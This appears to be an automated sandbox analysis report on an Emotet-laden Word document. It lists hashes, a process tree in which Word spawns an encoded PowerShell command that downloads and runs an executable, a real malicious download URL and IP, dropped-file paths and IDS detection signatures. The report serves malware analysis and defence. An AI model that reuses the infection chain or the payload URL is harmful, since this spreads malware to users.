File name: | check copy.doc.virus |
Full analysis: | https://app.any.run/tasks/fc397541-e130-4969-8cc0-60de5e382011 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 14:16:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Consequatur harum quos., Author: Edita Balov, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 18:32:00 2019, Last Saved Time/Date: Thu Nov 7 18:32:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0 |
MD5: | 1AC18D6A687C062779DFDAB612242A3C |
SHA1: | 06964026AB3E0BA5C7FC8DF7641C1171A6D82319 |
SHA256: | 1C21D6FB2E17A5D6DEDA5FAB46E7CFEABB56A1B9C598234431BBA513824CCFD5 |
SSDEEP: | 6144:gzCTdWsDiEBJxXHNaq2SzGdD48+aMOnVT4yYmdjSS:gzCTdWsDiEBJxdafWGe8+lOnVXdSS |
.doc | Microsoft Word document (80) |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 203 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 174 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:11:07 18:32:00 |
CreateDate: | 2019:11:07 18:32:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Edita Balážová |
Subject: | - |
Title: | Consequatur harum quos. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2152 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\check copy.doc.virus.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | |
3996 | powershell -enco [encoded command removed] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3048 | "C:\Users\admin\761.exe" | C:\Users\admin\761.exe | — | powershell.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Watson Subscriber for SENS Network Notifications; Exit code: 0; Version: 12.0.6606.1000 | | | |
2200 | --4d8d1bb0 | C:\Users\admin\761.exe | | 761.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Watson Subscriber for SENS Network Notifications; Exit code: 0; Version: 12.0.6606.1000 | | | |
2788 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 761.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Watson Subscriber for SENS Network Notifications; Exit code: 0; Version: 12.0.6606.1000 | | | |
3744 | --dfba43e0 | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | wholesspi.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Watson Subscriber for SENS Network Notifications; Version: 12.0.6606.1000 | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAAF0.tmp.cvr | — | — | — |
3996 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMAJA29DIZDYFQL0J2TY.temp | — | — | — |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D532FA.wmf | wmf | 54D4FEBE6016275B958F92EB88EF57FA | 550C4FA4EEF1C6D97B64D5CFE9DAE6C31BE84C8BBE5CA5DCBD42F6353B26DCEA |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C37ED0C.wmf | wmf | DAD18C4F34957EF8E85326B2090FE3E3 | 80CCCDFFB776D45B678C907EA53F4BEAEA8CAA60D9A717662DC86C9AA4EFD956 |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF2B877E230A1376A6.TMP | — | — | — |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2551C4B7-56CE-41D5-8AB8-961624A5D14F}.tmp | — | — | — |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{00481E3C-3D53-4594-8590-C7377465EC7E}.tmp | — | — | — |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94253177.wmf | wmf | C95BDB920C99871A00BCCA6D94528F91 | 7D99935B3E40EEB8400E94E73B1C6E9C56ABC16B9AEDE9CFB1EDB6DBF19A7F00 |
2152 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\check copy.doc.virus.doc.LNK | lnk | 813DA51AB256EA1D81A9844E0735B3B8 | FB65B7F7DD233B2DFFB5820472C146566DE568CD9816C88AD9BF772966B7BD38 |
3996 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39be0b.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3996 | powershell.exe | GET | 200 | 165.22.62.126:80 | http://nannakara.com/i0o9qtl/du6t8ywK/ | US | executable | 113 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3996 | powershell.exe | 165.22.62.126:80 | nannakara.com | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
nannakara.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3996 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3996 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3996 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |